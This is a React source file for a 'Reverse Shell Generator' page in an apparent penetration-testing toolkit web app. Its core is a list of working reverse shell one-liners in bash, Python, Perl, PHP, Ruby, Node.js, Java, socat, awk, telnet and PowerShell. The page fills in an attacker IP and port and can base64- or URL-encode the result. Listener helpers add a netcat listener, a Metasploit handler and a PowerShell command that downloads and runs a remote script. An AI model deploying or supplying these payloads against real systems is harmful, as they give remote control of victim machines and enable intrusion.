import React, { useState, useEffect } from "react";
import { useNavigate } from "react-router-dom";
import { Button } from "../../components/ui/button";
import { getAuth, onAuthStateChanged } from "firebase/auth";
import { Card, CardContent, CardHeader, CardTitle } from "../../components/ui/card";
import { Input } from "../../components/ui/input";
import { Label } from "../../components/ui/label";
import { Select, SelectContent, SelectItem, SelectTrigger, SelectValue } from "../../components/ui/select";
import { Textarea } from "../../components/ui/textarea";
import { Badge } from "../../components/ui/badge";
import { Switch } from "../../components/ui/switch";
import { Zap, Copy, Download, ExternalLink, AlertTriangle, CheckCircle } from "lucide-react";
import { toast } from "../../components/ui/use-toast";

interface ShellPayload {
  name: string;
  command: string;
  description: string;
  language: string;
  os: string[];
  tags?: string[];
  obfuscation?: string[];
  encoding?: string;
}

const ALL_PAYLOADS: ShellPayload[] = [
  // Bash
  {
    name: "Bash Reverse Shell",
    command: "bash -i >& /dev/tcp/{ip}/{port} 0>&1",
    description: "Basic bash reverse shell",
    language: "bash",
    os: ["linux", "unix", "macos"],
    tags: ["reverse"]
  },
  // Python
  {
    name: "Python Reverse Shell",
    command: "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{ip}\",{port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"]);'",
    description: "Python reverse shell",
    language: "python",
    os: ["linux", "unix", "macos"],
    tags: ["reverse"]
  },
  // Perl
  {
    name: "Perl Reverse Shell",
    command: 'perl -e \"use Socket;$i=\'{ip}\';$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\'tcp\'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};\"',
    description: "Perl reverse shell",
    language: "perl",
    os: ["linux", "unix", "macos"],
    tags: ["reverse"]
  },
  // PHP
  {
    name: "PHP Reverse Shell",
    command: 'php -r \"$sock=fsockopen(\'{ip}\',{port});exec(\"/bin/sh -i <&3 >&3 2>&3\");\"',
    description: "PHP reverse shell",
    language: "php",
    os: ["linux", "unix", "macos"],
    tags: ["reverse"]
  },
  // Ruby
  {
    name: "Ruby Reverse Shell",
    command: 'ruby -rsocket -e\'f=TCPSocket.open(\"{ip}\",{port}).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)\'',
    description: "Ruby reverse shell",
    language: "ruby",
    os: ["linux", "unix", "macos"],
    tags: ["reverse"]
  },
  // Node.js
  {
    name: "Node.js Reverse Shell",
    command: "node -e \"require('child_process').exec('bash -i >& /dev/tcp/{ip}/{port} 0>&1');\"",
    description: "Node.js reverse shell (run in node REPL)",
    language: "nodejs",
    os: ["linux", "unix", "macos"],
    tags: ["reverse"]
  },
  // Java
  {
    name: "Java Reverse Shell",
    command: 'r = Runtime.getRuntime();p = r.exec(new String[]{"/bin/sh","-c","exec 5<>/dev/tcp/{ip}/{port};cat <&5 | while read line; do $line 2>&5 >&5; done"});',
    description: "Java reverse shell (run in Java shell)",
    language: "java",
    os: ["linux", "unix", "macos"],
    tags: ["reverse"]
  },
  // Socat
  {
    name: "Socat Reverse Shell",
    command: "socat TCP:{ip}:{port} EXEC:'/bin/sh',pty,stderr,setsid,sigint,sane",
    description: "Socat reverse shell",
    language: "socat",
    os: ["linux", "unix", "macos"],
    tags: ["reverse"]
  },
  // Awk
  {
    name: "Awk Reverse Shell",
    command: "awk 'BEGIN {s = \"/inet/tcp/0/{ip}/{port}\"; while(42) { do{ printf \"shell> \" |& s; s |& getline c; if(c) { while ((c |& getline) > 0) print $0 |& s; close(c) } } while(c != \"exit\"); close(s); }}' /dev/null",
    description: "Awk reverse shell",
    language: "awk",
    os: ["linux", "unix", "macos"],
    tags: ["reverse"]
  },
  // Telnet
  {
    name: "Telnet Reverse Shell",
    command: 'rm -f /tmp/p; mknod /tmp/p p && telnet {ip} {port} 0</tmp/p | /bin/sh >/tmp/p 2>&1; rm -f /tmp/p',
    description: "Telnet reverse shell",
    language: "telnet",
    os: ["linux", "unix", "macos"],
    tags: ["reverse"]
  },
  // Xterm
  {
    name: "Xterm Reverse Shell",
    command: 'xterm -display {ip}:{port}',
    description: "Xterm reverse shell (requires X server)",
    language: "xterm",
    os: ["linux", "unix", "macos"],
    tags: ["reverse"]
  },
  // Windows PowerShell
  {
    name: "PowerShell Reverse Shell",
    command: "powershell -c \"$client = New-Object System.Net.Sockets.TCPClient('{ip}',{port});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"",
    description: "PowerShell reverse shell",
    language: "powershell",
    os: ["windows"],
    tags: ["reverse"]
  },
  // ... add more ...
];

export const ReverseShellPage = (): JSX.Element => {
  const navigate = useNavigate();
  const [loading, setLoading] = useState(true);
  const [error, setError] = useState<string | null>(null);
  const auth = getAuth();

  // Form state
  const [ipAddress, setIpAddress] = useState("");
  const [port, setPort] = useState("4444");
  const [encoding, setEncoding] = useState("none");
  const [search, setSearch] = useState("");
  const [language, setLanguage] = useState("all");
  const [os, setOs] = useState("all");
  const [tag, setTag] = useState("all");
  const [hasGenerated, setHasGenerated] = useState(false);

  // Filtering options
  const languageOptions = ["all", ...Array.from(new Set(ALL_PAYLOADS.map(p => p.language)))];
  const osOptions = ["all", ...Array.from(new Set(ALL_PAYLOADS.flatMap(p => p.os)))];
  const tagOptions = ["all", ...Array.from(new Set(ALL_PAYLOADS.flatMap(p => p.tags || [])))];

  useEffect(() => {
    const unsubscribe = onAuthStateChanged(auth, (user) => {
      if (!user) {
        navigate('/signin');
      }
      setLoading(false);
    });
    return () => unsubscribe();
  }, [navigate]);

  const handleSignOut = async () => {
    try {
      if (auth) {
        await auth.signOut();
        navigate('/signin');
      }
    } catch (error) {
      console.error('Error signing out:', error);
    }
  };

  // Filtering and searching logic
  const filteredPayloads = ALL_PAYLOADS.filter(payload => {
    if (language !== "all" && payload.language !== language) return false;
    if (os !== "all" && !payload.os.includes(os)) return false;
    if (tag !== "all" && !(payload.tags || []).includes(tag)) return false;
    if (search && !(
      payload.name.toLowerCase().includes(search.toLowerCase()) ||
      payload.description.toLowerCase().includes(search.toLowerCase()) ||
      payload.command.toLowerCase().includes(search.toLowerCase())
    )) return false;
    return true;
  });

  // Replace variables and encode
  const getFinalCommand = (cmd: string) => {
    let replaced = cmd.replaceAll("{ip}", ipAddress || "<ip>").replaceAll("{port}", port || "<port>");
    if (encoding === "base64") {
      try {
        replaced = `echo '${btoa(replaced)}' | base64 -d | bash`;
      } catch {}
    } else if (encoding === "url") {
      replaced = encodeURIComponent(replaced);
    } else if (encoding === "double-url") {
      replaced = encodeURIComponent(encodeURIComponent(replaced));
    }
    return replaced;
  };

  const copyToClipboard = async (text: string) => {
    try {
      await navigator.clipboard.writeText(text);
      toast({ title: "Copied!", description: "Payload copied to clipboard." });
    } catch (error) {
      toast({ title: "Copy Failed", description: "Failed to copy to clipboard.", variant: "destructive" });
    }
  };

  // UI
  if (loading) {
    return <div className="min-h-screen w-full bg-[#e1dcdc75] flex items-center justify-center"><div className="text-black">Loading...</div></div>;
  }
  if (error) {
    return <div className="min-h-screen w-full bg-[#e1dcdc75] flex items-center justify-center"><div className="text-center"><p className="text-red-600 mb-4">{error}</p><Button onClick={() => window.location.reload()}>Retry</Button></div></div>;
  }

  return (
    <div className="min-h-screen w-full bg-[#e1dcdc75] relative">
      {/* Navigation bar */}
      <div className="fixed w-full px-4 top-[46px] z-10">
        <div className="max-w-[1257px] mx-auto h-[77px] relative rounded-[28px]">
          <div className="absolute w-full h-full top-0 left-0 bg-white rounded-[28px] shadow-[0px_4px_4px_#00000040] blur-[3.05px] opacity-[0.53]" />
          <div className="relative h-full flex items-center justify-between px-6">
            <div className="flex items-center gap-4 cursor-pointer" onClick={() => navigate('/dashboard')}>
              <img className="w-[27px] h-[27px] object-cover" alt="Beetle" src="/beetle.png" />
              <span className="font-['Space_Grotesk'] font-bold text-black text-[32px]">RAWPA</span>
            </div>
            <div className="flex items-center gap-4">
              <Button variant="outline" onClick={() => navigate('/toolkits')} className="font-['Space_Grotesk'] text-black hidden lg:flex">Back to Toolkits</Button>
              <div onClick={handleSignOut} className="w-[48px] h-[48px] bg-[#daed6e] rounded-[12px] flex items-center justify-center cursor-pointer hover:bg-[#c5d85c] transition-colors"><img className="w-6 h-6" alt="Sign Out" src="/user-icon.svg" /></div>
            </div>
          </div>
        </div>
      </div>

      {/* Main content */}
      <div className="container mx-auto px-4 pt-[160px] pb-12">
        <div className="bg-white rounded-[20px] p-8 shadow-lg">
          {/* Mobile back button */}
          <div className="lg:hidden mb-4">
            <button 
              onClick={() => navigate('/toolkits')}
              className="text-black opacity-60 hover:opacity-100 transition-opacity font-['Space_Grotesk']"
            >
              ← Back to Toolkits
            </button>
          </div>

          {/* Header */}
          <div className="mb-8">
            <div className="flex items-center gap-3 mb-4">
              <div className="w-12 h-12 bg-red-500 rounded-lg flex items-center justify-center"><Zap className="w-6 h-6 text-white" /></div>
              <div>
                <h1 className="font-['Space_Grotesk'] font-bold text-2xl text-black mb-2">Reverse Shell Generator</h1>
                <p className="font-['Space_Grotesk'] text-sm text-black opacity-80">Generate reverse shell payloads for various platforms and languages</p>
              </div>
            </div>
          </div>

          {/* Configuration Card */}
          <Card className="border-2 border-[#E7E7E7] mb-8">
            <CardHeader>
              <CardTitle className="text-xl text-black">Configuration</CardTitle>
            </CardHeader>
            <CardContent className="space-y-6">
              <div className="flex flex-wrap gap-4 items-end">
                <div>
                  <Label>Language</Label>
                  <select className="block border rounded px-2 py-1" value={language} onChange={e => setLanguage(e.target.value)}>{languageOptions.map(opt => <option key={opt} value={opt}>{opt}</option>)}</select>
                </div>
                <div>
                  <Label>OS</Label>
                  <select className="block border rounded px-2 py-1" value={os} onChange={e => setOs(e.target.value)}>{osOptions.map(opt => <option key={opt} value={opt}>{opt}</option>)}</select>
                </div>
                <div>
                  <Label>Tag</Label>
                  <select className="block border rounded px-2 py-1" value={tag} onChange={e => setTag(e.target.value)}>{tagOptions.map(opt => <option key={opt} value={opt}>{opt}</option>)}</select>
                </div>
                <div>
                  <Label>Encoding</Label>
                  <select className="block border rounded px-2 py-1" value={encoding} onChange={e => setEncoding(e.target.value)}>
                    <option value="none">None</option>
                    <option value="base64">Base64</option>
                    <option value="url">URL Encode</option>
                    <option value="double-url">Double URL Encode</option>
                  </select>
                </div>
                <div className="flex-1">
                  <Label>Search</Label>
                  <input className="block border rounded px-2 py-1 w-full" value={search} onChange={e => setSearch(e.target.value)} placeholder="Search payloads..." />
                </div>
              </div>
              <div className="flex flex-wrap gap-4 mt-4">
                <div>
                  <Label>IP Address</Label>
                  <input className="block border rounded px-2 py-1" value={ipAddress} onChange={e => setIpAddress(e.target.value)} placeholder="192.168.1.100" />
                </div>
                <div>
                  <Label>Port</Label>
                  <input className="block border rounded px-2 py-1" value={port} onChange={e => setPort(e.target.value)} placeholder="4444" type="number" min="1" max="65535" />
                </div>
                <div className="flex items-end">
                  <Button className="bg-red-500 hover:bg-red-600 text-white" onClick={() => setHasGenerated(true)}>Generate Payloads</Button>
                </div>
              </div>
            </CardContent>
          </Card>

          {/* Payloads */}
          {hasGenerated && (
            <>
              <div className="grid grid-cols-1 md:grid-cols-2 gap-4">
                {filteredPayloads.length === 0 && <div className="col-span-2 text-center text-gray-500">No payloads found.</div>}
                {filteredPayloads.map((payload, idx) => (
                  <Card key={idx} className="border-2 cursor-pointer transition-all hover:border-red-500">
                    <CardHeader className="pb-3">
                      <div className="flex items-center justify-between">
                        <CardTitle className="text-lg text-black">{payload.name}</CardTitle>
                        <div className="flex items-center gap-2">
                          {payload.tags && payload.tags.map((t, i) => <Badge key={i} variant="outline" className="text-xs">{t}</Badge>)}
                          <Badge variant="outline" className="text-xs">{payload.language}</Badge>
                        </div>
                      </div>
                      <p className="text-sm text-gray-600">{payload.description}</p>
                      <div className="flex flex-wrap gap-1">
                        {payload.os.map((osName, osIndex) => (<Badge key={osIndex} variant="secondary" className="text-xs">{osName}</Badge>))}
                      </div>
                    </CardHeader>
                    <CardContent className="pt-0">
                      <div className="space-y-3">
                        <div className="flex items-center gap-2">
                          <Textarea value={getFinalCommand(payload.command)} readOnly className="font-mono text-sm min-h-[80px]" />
                        </div>
                        <div className="flex items-center gap-2">
                          <Button size="sm" variant="outline" onClick={() => copyToClipboard(getFinalCommand(payload.command))}><Copy className="w-4 h-4 mr-1" />Copy</Button>
                        </div>
                      </div>
                    </CardContent>
                  </Card>
                ))}
              </div>

              {/* Listener Helper */}
              <Card className="mt-8 border-2 border-[#E7E7E7]">
                <CardHeader>
                  <CardTitle className="text-xl text-black">Listener Helper</CardTitle>
                </CardHeader>
                <CardContent>
                  <div className="flex flex-col gap-2">
                    <Label>Netcat Listener</Label>
                    <div className="flex items-center gap-2">
                      <Input value={`nc -lvp ${port}`} readOnly className="font-mono text-sm" />
                      <Button size="sm" variant="outline" onClick={() => copyToClipboard(`nc -lvp ${port}`)}><Copy className="w-4 h-4" /></Button>
                    </div>
                    <Label>PowerShell Listener</Label>
                    <div className="flex items-center gap-2">
                      <Input value={`powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://${ipAddress}:8080/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress ${ipAddress} -Port ${port}"`} readOnly className="font-mono text-xs" />
                      <Button size="sm" variant="outline" onClick={() => copyToClipboard(`powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://${ipAddress}:8080/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress ${ipAddress} -Port ${port}"`)}><Copy className="w-4 h-4" /></Button>
                    </div>
                    <Label>Metasploit Handler</Label>
                    <div className="flex items-center gap-2">
                      <Textarea value={`use exploit/multi/handler\nset PAYLOAD windows/shell_reverse_tcp\nset LHOST ${ipAddress}\nset LPORT ${port}\nexploit`} readOnly className="font-mono text-xs" />
                      <Button size="sm" variant="outline" onClick={() => copyToClipboard(`use exploit/multi/handler\nset PAYLOAD windows/shell_reverse_tcp\nset LHOST ${ipAddress}\nset LPORT ${port}\nexploit`)}><Copy className="w-4 h-4" /></Button>
                    </div>
                  </div>
                </CardContent>
              </Card>
            </>
          )}
        </div>
      </div>
    </div>
  );
}; 